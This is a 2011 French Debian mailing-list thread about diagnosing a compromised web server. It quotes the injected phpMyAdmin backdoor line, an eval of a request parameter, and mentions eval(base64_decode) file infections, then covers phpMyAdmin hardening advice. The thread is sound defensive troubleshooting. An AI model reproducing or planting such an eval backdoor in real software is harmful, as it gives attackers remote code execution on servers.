Re: [HS] Serveur corrompu, besoin de conseil
Le jeudi 16 juin 2011, Gilles Mocellin a écrit : Le Thursday 16 June 2011 22:46:25 cor...@free.fr, vous avez écrit : Je ne vois aucune directive Alias ..., ni dans apache2.conf, ni dans 000-default ... de mon serveur et pourtant phpmyadmin fonctionne très bien en mode distant (http://mon-serveur/phpmyadmin) Ça m'intéresse pour blinder un peu mon serveur. La conf de phpmyadmin est là : /etc/apache2/conf.d/phpmyadmin.conf Merci, ça marche. -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/201106171407.08886.cor...@free.fr
Re: [HS] Serveur corrompu, besoin de conseil
Le 15/06/2011 10:47, bruno.deb...@cyberoso.com a écrit : Le Wed, 15 Jun 2011 10:15:04 +0200, Romaric DEFAUXr...@audaxis.com a écrit : Salut la liste ! J'aurai besoin de conseil. On a un serveur corrompu (on en est sûr à 99% qu'il est corrompu). C'est un serveur web Ubuntu 8.04.4 LTS. Voici les symptômes : - des fichiers php sont modifiés tous les 4h : la balise php ouvrante est remplacée par : ?php eval(base64_decode( suivi de code en base 64 - des process qui ne devraient pas font des connections vers notre ldap : tcp1 0 192.168.2.201:51954 192.168.2.182:389 CLOSE_WAIT 6333/postgres tcp0 0 192.168.2.201:41109 192.168.2.182:389 TIME_WAIT - tcp1 0 192.168.2.201:51946 192.168.2.182:389 CLOSE_WAIT 6256/mysqld tcp0 0 192.168.2.201:41110 192.168.2.182:389 TIME_WAIT - tcp1 0 192.168.2.201:51963 192.168.2.182:389 CLOSE_WAIT 6384/nrpe - des process cachés sont découverts avec unhide (ce sont peut-être des faux positifs ?) unhide brute Unhide 02-11-2007 yje...@security-projects.com [*]Starting scanning using brute force against PIDS Found HIDDEN PID: 1875 Found HIDDEN PID: 11836 Found HIDDEN PID: 19403 Found HIDDEN PID: 22328 Found HIDDEN PID: 22333 Found HIDDEN PID: 22541 Les pid changent. On ne sait pas comment c'est arrivé (mais on suppose via un joomla ou un wordpress), du coup on craint qu'une réinstallation totale ne serve à rien. Est-ce que vous auriez des conseils à donner ? Etant donné que c'est un serveur de prod, on ne l'a pas encore isolé du réseau. Merci d'avance Romaric Bonjour, Cherche dans les logs d'apache les requetes POST. Ces scripts sont souvent commandés à distance. Sinon, cherche des fichiers php dans les répertoire où les utilisateurs peuvent uploader (et plus globalement là où ils ne devraient pas y en avoir). Tu peux aussi, si tu as les sources quelque part, comparer les arborescences. Bon courage Bruno C'est bon on a trouvé d'où ça vient. Et c'est moins grave que ce qu'on pensait (ouf !). Le serveur n'a pas été compromis (on en est sûr à 99%), le pirate aurait plutôt utilisé une faille dans un phpmyadmin. J'ai trouvé effectivement des POST intéressants dans les logs d'apache : cd /var/log/apache2 cat *.log | grep 'POST' /root/analyse.txt cd root Ensuite j'ai cherché quels étaient les post fait à cette heure ci : cat analyse.txt | grep -i ':08:34' Deux lignes m'ont interpellées : 75.67.197.129 - - [14/Jun/2011:08:34:29 +0200] POST /phpmyadmin/config/config.inc.php HTTP/1.1 200 19 - Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2; 60.28.179.32 - - [15/Jun/2011:08:34:51 +0200] POST /phpmyadmin/config/config.inc.php HTTP/1.1 200 19 - Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2; vim /µ../phpmyadmin/config/config.inc.php: ?php /* * Generated configuration file * Generated by: phpMyAdmin 2.11.8.1 setup script by Michal Čihař mic...@cihar.com * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $ * Date: Sun, 12 Jun 2011 06:44:58 GMT */ /* Servers configuration */ $i = 0; /* Server (config:root) [1] */ $i++; $cfg['Servers'][$i]['host']=''; if(isset(\$_REQUEST['asc']))eval(stripslashes(\$_REQUEST['asc']));//'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysqli'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root'; /* End of servers configuration */ ? La ligne if(isset(\$_REQUEST['asc']))eval(stripslashes(\$_REQUEST['asc']));//'] = 'localhost'; est clairement suspecte. Bref, j'ai fini par trouver que c'était ça : http://www.whitefirdesign.com/resources/jfgjfr5jdfjvvcc-malware.html Romaric smime.p7s Description: S/MIME Cryptographic Signature
Re: [HS] Serveur corrompu, besoin de conseil
Le jeudi 16 juin 2011, Romaric DEFAUX a écrit : C'est bon on a trouvé d'où ça vient. Et c'est moins grave que ce qu'on pensait (ouf !). Le serveur n'a pas été compromis (on en est sûr à 99%), le pirate aurait plutôt utilisé une faille dans un phpmyadmin. La ligne if(isset(\$_REQUEST['asc']))eval(stripslashes(\$_REQUEST['asc']));//'] = 'localhost'; est clairement suspecte. Bref, j'ai fini par trouver que c'était ça : http://www.whitefirdesign.com/resources/jfgjfr5jdfjvvcc-malware.html Romaric --- Cette écriture dans le fichier /etc/phpmyadmin/config.inc.ini est-elle possible dans bien des serveurs (ayant phpmyadmin) ? Si oui, quelle parade ? Merci. -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/201106161223.58979.cor...@free.fr
Re: [HS] Serveur corrompu, besoin de conseil
Le jeudi 16 juin 2011 à 12:23:58, cor...@free.fr a écrit : […] Cette écriture dans le fichier /etc/phpmyadmin/config.inc.ini est-elle possible dans bien des serveurs (ayant phpmyadmin) ? Si oui, quelle parade ? Ne pas avoir un phpmyadmin ouvert à tout vent sur une machine de prod. ? -- Sylvain Sauvage -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/201106161430.41878.sylvain.l.sauv...@free.fr
Re: [HS] Serveur corrompu, besoin de conseil
Le jeudi 16 juin 2011, Sylvain L. Sauvage a écrit : Le jeudi 16 juin 2011 à 12:23:58, cor...@free.fr a écrit : /etc/phpmyadmin/config.inc.ini est-elle possible dans bien des serveurs (ayant phpmyadmin) ? Si oui, quelle parade ? Ne pas avoir un phpmyadmin ouvert à tout vent sur une machine de prod. ? Sylvain Sauvage Quelle solution, un exemple ... ? -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/201106161816.15306.cor...@free.fr
Re: [HS] Serveur corrompu, besoin de conseil
On 16/06/2011 18:16, cor...@free.fr wrote: Le jeudi 16 juin 2011, Sylvain L. Sauvage a écrit : Le jeudi 16 juin 2011 à 12:23:58, cor...@free.fr a écrit : /etc/phpmyadmin/config.inc.ini est-elle possible dans bien des serveurs (ayant phpmyadmin) ? Si oui, quelle parade ? Ne pas avoir un phpmyadmin ouvert à tout vent sur une machine de prod. ? Sylvain Sauvage Quelle solution, un exemple ... ? Tout d'abord, ne jamais garder de nom standard : (conseil valable pour plein d'autre choses) /phpmyadmin devient /mongestionnairedebase par exemple. Mes logs sont remplis d'attaque sur des pages /phpmyadmin Ensuite, as-tu vraiment besoin d'un accès phpmyadmin sur le serveur? Après, toutes les restrictions imaginables : par IP, par certificats, sur un autre port ... Bruno -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/4dfa2e6c.2080...@cyberoso.com
Re: [HS] Serveur corrompu, besoin de conseil
On Thu, 16 Jun 2011 18:16:15 +0200, cor...@free.fr wrote: Le jeudi 16 juin 2011, Sylvain L. Sauvage a écrit : Le jeudi 16 juin 2011 à 12:23:58, cor...@free.fr a écrit : /etc/phpmyadmin/config.inc.ini est-elle possible dans bien des serveurs (ayant phpmyadmin) ? Si oui, quelle parade ? Ne pas avoir un phpmyadmin ouvert à tout vent sur une machine de prod. ? Sylvain Sauvage Quelle solution, un exemple ... ? Si (et seulement si) un phpmyadmin doit être atteignable à partir de l'extérieur (ce qui est de toute façon une mauvaise solution puisqu'une machine en prod est censée faire tourner su stable), soit ne le faire tourner que sur localhost et le tunneliser en SSH; et si son accès doit-être strictement limité, passer par une solution SSL de type stunnel avec certificats clients. -- Support mental health or I'LL KILL YOU -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/20110616183033.293259c3@anubis.defcon1
Re: [HS] Serveur corrompu, besoin de conseil
Le jeudi 16 juin 2011, bruno a écrit : On 16/06/2011 18:16, cor...@free.fr wrote: Le jeudi 16 juin 2011, Sylvain L. Sauvage a écrit : Le jeudi 16 juin 2011 à 12:23:58, cor...@free.fr a écrit : /etc/phpmyadmin/config.inc.ini est-elle possible dans bien des serveurs (ayant phpmyadmin) ? Si oui, quelle parade ? Ne pas avoir un phpmyadmin ouvert à tout vent sur une machine de prod. ? Sylvain Sauvage Quelle solution, un exemple ... ? Tout d'abord, ne jamais garder de nom standard : (conseil valable pour plein d'autre choses) /phpmyadmin devient /mongestionnairedebase par exemple. Bruno Comment modifier le nom ? : http://mon serveur/phpmyadmin = mongestionnairedebase ? -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/201106161838.12315.cor...@free.fr
Re: [HS] Serveur corrompu, besoin de conseil
On 16/06/2011 18:38, cor...@free.fr wrote: Le jeudi 16 juin 2011, bruno a écrit : On 16/06/2011 18:16, cor...@free.fr wrote: Le jeudi 16 juin 2011, Sylvain L. Sauvage a écrit : Le jeudi 16 juin 2011 à 12:23:58, cor...@free.fr a écrit : /etc/phpmyadmin/config.inc.ini est-elle possible dans bien des serveurs (ayant phpmyadmin) ? Si oui, quelle parade ? Ne pas avoir un phpmyadmin ouvert à tout vent sur une machine de prod. ? Sylvain Sauvage Quelle solution, un exemple ... ? Tout d'abord, ne jamais garder de nom standard : (conseil valable pour plein d'autre choses) /phpmyadmin devient /mongestionnairedebase par exemple. Bruno Comment modifier le nom ? : http://mon serveur/phpmyadmin = mongestionnairedebase ? http://mon serveur/phpmyadmin = http://mon serveur/mongestionnairedebase ? ce n'est qu'un exemple -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/4dfa3224.1010...@cyberoso.com
Re: [HS] Serveur corrompu, besoin de conseil
Le jeudi 16 juin 2011, bruno a écrit : Comment modifier le nom ? : http://mon serveur/phpmyadmin = mongestionnairedebase ? http://mon serveur/phpmyadmin = http://mon serveur/mongestionnairedebase ? ce n'est qu'un exemple. Bruno Va t-on y arriver ? :-) Comment dire à phpmyadmin que l'adresse Web est dorénavant : http://mon serveur/mongestionnairedebase -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/201106161919.44887.cor...@free.fr
Re: [HS] Serveur corrompu, besoin de conseil
On Thu, Jun 16, 2011 at 07:19:44PM +0200, cor...@free.fr wrote: http://mon serveur/phpmyadmin = http://mon serveur/mongestionnairedebase ? ce n'est qu'un exemple. Bruno Va t-on y arriver ? :-) Comment dire à phpmyadmin que l'adresse Web est dorénavant : http://mon serveur/mongestionnairedebase Dans la configuration d'Apache, probablement avec la directive Alias. En fait, il doit déjà y avoir une directive Alias pour phpmyadmin. Y. -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/20110616182953.gk7...@naryves.com
Re: [HS] Serveur corrompu, besoin de conseil
On Thu, Jun 16, 2011 at 06:48:39PM +0200, Jean-Yves F. Barbier wrote: Après, toutes les restrictions imaginables : par IP, par certificats, ^^^ sur un autre port ... ^^^ Mauvaises solutions: une adresse IP ça se spoof, et changer de port ne sert à rien contre les scanners. Quant'à changer le nom standard tout en gardant la porte ouverte, c'est un peu comme monter en haut ou descendre en bas... Ça te défend déjà de tous les scans automatiques. Certes, il restera ceux qui veulent t'attaquer toi spécifiquement, mais l'expérience de déplacer le port ssh montre que ça diminue énormément le nombre de tentatives d'attaques automatiques. C'est pareil pour les services Web. C'est donc un peu comme cacher la clé dans le jardin: on ne se protége pas de ceux qui vont fouiller le jardin, mais on se protège de ceux qui passent en essayant d'ouvrir les portes sans s'attarder. Y. -- c'est bien les métaphores :-) -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/20110616183323.gl7...@naryves.com
Re: [HS] Serveur corrompu, besoin de conseil
Le jeudi 16 juin 2011, Yves Rutschle a écrit : On Thu, Jun 16, 2011 at 07:19:44PM +0200, cor...@free.fr wrote: http://mon serveur/phpmyadmin = http://mon serveur/mongestionnairedebase ? ce n'est qu'un exemple. Bruno Va t-on y arriver ? :-) Comment dire à phpmyadmin que l'adresse Web est dorénavant : http://mon serveur/mongestionnairedebase Dans la configuration d'Apache, probablement avec la directive Alias. En fait, il doit déjà y avoir une directive Alias pour phpmyadmin. Y - Je ne vois aucune directive Alias ..., ni dans apache2.conf, ni dans 000-default ... de mon serveur et pourtant phpmyadmin fonctionne très bien en mode distant (http://mon-serveur/phpmyadmin) Ça m'intéresse pour blinder un peu mon serveur. -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/201106162246.25492.cor...@free.fr
Re: [HS] Serveur corrompu, besoin de conseil
Le 15141ième jour après Epoch, cor...@free.fr écrivait: Le jeudi 16 juin 2011, Yves Rutschle a écrit : On Thu, Jun 16, 2011 at 07:19:44PM +0200, cor...@free.fr wrote: http://mon serveur/phpmyadmin = http://mon serveur/mongestionnairedebase ? ce n'est qu'un exemple. Bruno Va t-on y arriver ? :-) Comment dire à phpmyadmin que l'adresse Web est dorénavant : http://mon serveur/mongestionnairedebase Dans la configuration d'Apache, probablement avec la directive Alias. En fait, il doit déjà y avoir une directive Alias pour phpmyadmin. Y - Je ne vois aucune directive Alias ..., ni dans apache2.conf, ni dans 000-default ... de mon serveur et pourtant phpmyadmin fonctionne très bien en mode distant (http://mon-serveur/phpmyadmin) Il me semble que phpmyadmin pose ses crottes dans /etc/apache2/conf.d/ de mémoire... Par contre, tu peux toujours essayer Mysql Query Browser et MySQL Administrator qui sont des outils Gnome remplaçant avantageusement cette immondice de trous de sécurité qu'est phpmyadmin. -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/87fwn9iio9@fermat.tourde.home
Re: [HS] Serveur corrompu, besoin de conseil
On Thu, Jun 16, 2011 at 10:46:25PM +0200, cor...@free.fr wrote: Je ne vois aucune directive Alias ..., ni dans apache2.conf, ni dans 000-default ... de mon serveur et pourtant phpmyadmin fonctionne très bien en mode distant (http://mon-serveur/phpmyadmin) Ça serait plutôt dans conf.d, mais cherche partout: cd /etc/apache2 grep -r phpmyadmin * Y. -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/20110616205738.ga31...@naryves.com
Re: [HS] Serveur corrompu, besoin de conseil
Le Thursday 16 June 2011 22:46:25 cor...@free.fr, vous avez écrit : [...] Je ne vois aucune directive Alias ..., ni dans apache2.conf, ni dans 000-default ... de mon serveur et pourtant phpmyadmin fonctionne très bien en mode distant (http://mon-serveur/phpmyadmin) Ça m'intéresse pour blinder un peu mon serveur. La conf de phpmyadmin est là : /etc/apache2/conf.d/phpmyadmin.conf signature.asc Description: This is a digitally signed message part.
Re: [HS] Serveur corrompu, besoin de conseil
Le 06/15/11 10:15, Romaric DEFAUX a écrit : Salut la liste ! Bonjour J'aurai besoin de conseil. On a un serveur corrompu (on en est sûr à 99% qu'il est corrompu). C'est un serveur web Ubuntu 8.04.4 LTS. Arg! Est-ce que vous auriez des conseils à donner ? A mon avis : Arrêter les bases de données Ne pas faire de shutdown standard, cela pourrait effacer des traces. Sauvegarder la machine en l'etat le + tot possible. Ne réutliser cette sauvegarde qu'en Read Only/Noexec sur un nouveau système La réinstallation du serveur vous enlévera tout doute, Bon courage -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/4df87057.7060...@shom.fr
Re: [HS] Serveur corrompu, besoin de conseil
Le Wed, 15 Jun 2011 10:15:04 +0200, Romaric DEFAUX r...@audaxis.com a écrit : Salut la liste ! J'aurai besoin de conseil. On a un serveur corrompu (on en est sûr à 99% qu'il est corrompu). C'est un serveur web Ubuntu 8.04.4 LTS. Voici les symptômes : - des fichiers php sont modifiés tous les 4h : la balise php ouvrante est remplacée par : ?php eval(base64_decode( suivi de code en base 64 - des process qui ne devraient pas font des connections vers notre ldap : tcp1 0 192.168.2.201:51954 192.168.2.182:389 CLOSE_WAIT 6333/postgres tcp0 0 192.168.2.201:41109 192.168.2.182:389 TIME_WAIT - tcp1 0 192.168.2.201:51946 192.168.2.182:389 CLOSE_WAIT 6256/mysqld tcp0 0 192.168.2.201:41110 192.168.2.182:389 TIME_WAIT - tcp1 0 192.168.2.201:51963 192.168.2.182:389 CLOSE_WAIT 6384/nrpe - des process cachés sont découverts avec unhide (ce sont peut-être des faux positifs ?) unhide brute Unhide 02-11-2007 yje...@security-projects.com [*]Starting scanning using brute force against PIDS Found HIDDEN PID: 1875 Found HIDDEN PID: 11836 Found HIDDEN PID: 19403 Found HIDDEN PID: 22328 Found HIDDEN PID: 22333 Found HIDDEN PID: 22541 Les pid changent. On ne sait pas comment c'est arrivé (mais on suppose via un joomla ou un wordpress), du coup on craint qu'une réinstallation totale ne serve à rien. Est-ce que vous auriez des conseils à donner ? Etant donné que c'est un serveur de prod, on ne l'a pas encore isolé du réseau. Merci d'avance Romaric Bonjour, Cherche dans les logs d'apache les requetes POST. Ces scripts sont souvent commandés à distance. Sinon, cherche des fichiers php dans les répertoire où les utilisateurs peuvent uploader (et plus globalement là où ils ne devraient pas y en avoir). Tu peux aussi, si tu as les sources quelque part, comparer les arborescences. Bon courage Bruno -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/20110615104716.499b6...@bruno.vf-online.local
Re: [HS] Serveur corrompu, besoin de conseil
Le mercredi 15 juin 2011, Romaric DEFAUX a écrit : J'aurai besoin de conseil. On a un serveur corrompu (on en est sûr à 99% qu'il est corrompu). C'est un serveur web Ubuntu 8.04.4 LTS. [cut ...] On ne sait pas comment c'est arrivé (mais on suppose via un joomla ou un wordpress), du coup on craint qu'une réinstallation totale ne serve à rien. [cut ...] Romaric -- Ce serveur abrite des sites Web dont certains sous Joomla et Wordpress ? Des attaques sur le serveur se feraient via ces sites CMS ? -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/201106151057.12331.cor...@free.fr
Re: [HS] Serveur corrompu, besoin de conseil
Le 15140ième jour après Epoch, Romaric DEFAUX écrivait: Est-ce que vous auriez des conseils à donner ? Etant donné que c'est un serveur de prod, on ne l'a pas encore isolé du réseau. Première erreur... Faut le débrancher tout de suite du réseau, et mettre à la place une gentille page disant que ça va revenir bientôt Ensuite, éviter de s'y connecter. Si le filesystème est journalisé, alors un bon arrêt électrique suivi d'un redémarrage avec un LiveCD ou un autre disque dur, et ne monter les morceaux infectés qu'avec précaution. - des fichiers php sont modifiés tous les 4h : la balise php ouvrante est remplacée par : ?php eval(base64_decode( suivi de code en base 64 Tu peux regarder le code en question avec la commande base64, tu seras un peu plus fixé sur ce qu'il s'y passe. - des process qui ne devraient pas font des connections vers notre ldap : tcp1 0 192.168.2.201:51954 192.168.2.182:389 CLOSE_WAIT 6333/postgres tcp0 0 192.168.2.201:41109 192.168.2.182:389 TIME_WAIT - tcp1 0 192.168.2.201:51946 192.168.2.182:389 CLOSE_WAIT 6256/mysqld tcp0 0 192.168.2.201:41110 192.168.2.182:389 TIME_WAIT - tcp1 0 192.168.2.201:51963 192.168.2.182:389 CLOSE_WAIT 6384/nrpe Je ne connais pas nrpe, mais postgres et mysqld sont prévus pour faire des accès ldap. Tu peux toutefois comparer les binaires (avec un md5sum par exemple) de la machine avec une install fresh, pour voir si ces binaires sont malicieux. On ne sait pas comment c'est arrivé (mais on suppose via un joomla ou un wordpress), du coup on craint qu'une réinstallation totale ne serve à rien. Si les logs http n'ont pas été effacées, tu devrais pouvoir trouver la source de l'infection avec, si c'est bien passé par Joomla ou Wordpress. Mais dans 99% des cas, c'est une machine zombie elle-même qui a effectué l'infection. Bon courage. pgpZKYLuuLUCy.pgp Description: PGP signature
Re: [HS] Serveur corrompu, besoin de conseil
Bonjour, Le mercredi 15 juin 2011, Romaric DEFAUX a écrit... - des fichiers php sont modifiés tous les 4h : Donc possible crontab. Ce que j'ai repéré récemment dans la machine de quelqu'un. Un dossier /home/test (utilisateur test créé par le propriétaire de la machine) corrompu par /home/test/.n/, avec tout un tas de saloperies (intéressantes !) dedans + crontab pour l'utilisateur test dans /var/spool/cron/crontab (`crontab -u test` pour voir). La crontab rechargeait la base de données du bot (c'était un bot spammeur) caché sous le processus bash la balise php ouvrante est remplacée par : ?php eval(base64_decode( suivi de code en base 64 Passer le début de la chaine b64 chez Google : tu devrais avoir qqch qui te permettra de savoir ce que fait le bouzin ; j'ai déjà vu ça sur un site ouèbe « fait maison », un espèce d'appli Command And Control avec un fichier .png qui était en fait un fichier php déguisé permettant le CC. A voir si tu as la possibilité de repérer d'éventuels fichiers plus ou moins récents (man find) qui seraient cachés dans du pseudo fichier image, ou autre extension fréquente dans un site ouèbe. Est-ce que vous auriez des conseils à donner ? Etant donné que c'est un serveur de prod, on ne l'a pas encore isolé du réseau. Ce n'est pas forcément méchant. Il te faut voir ce que c'est avant de tout formater. En espérant que tu possèdes des sauvegardes des sites, car tous les fichiers .php peuvent se trouver infectés. -- jm -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchLists Pour vous DESABONNER, envoyez un message avec comme objet unsubscribe vers debian-user-french-requ...@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmas...@lists.debian.org Archive: http://lists.debian.org/20110615163156.GD20979@espinasse